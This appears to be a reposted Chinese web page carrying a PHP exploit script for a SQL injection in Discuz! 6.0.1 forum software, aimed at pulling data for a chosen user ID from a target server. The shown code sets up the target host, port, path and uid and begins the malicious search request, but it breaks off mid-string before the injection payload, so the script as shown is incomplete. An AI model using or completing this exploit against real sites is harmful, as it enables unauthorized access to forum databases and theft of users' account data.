Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

互联网   发布时间:2008-10-08 21:00:55   作者:佚名   我要评论
<?php error_reporting(E_ALL&E_NOTICE); print_r(" ------------------------------------------------------------------ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY james ----------------------------------------
<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

相关文章

最新评论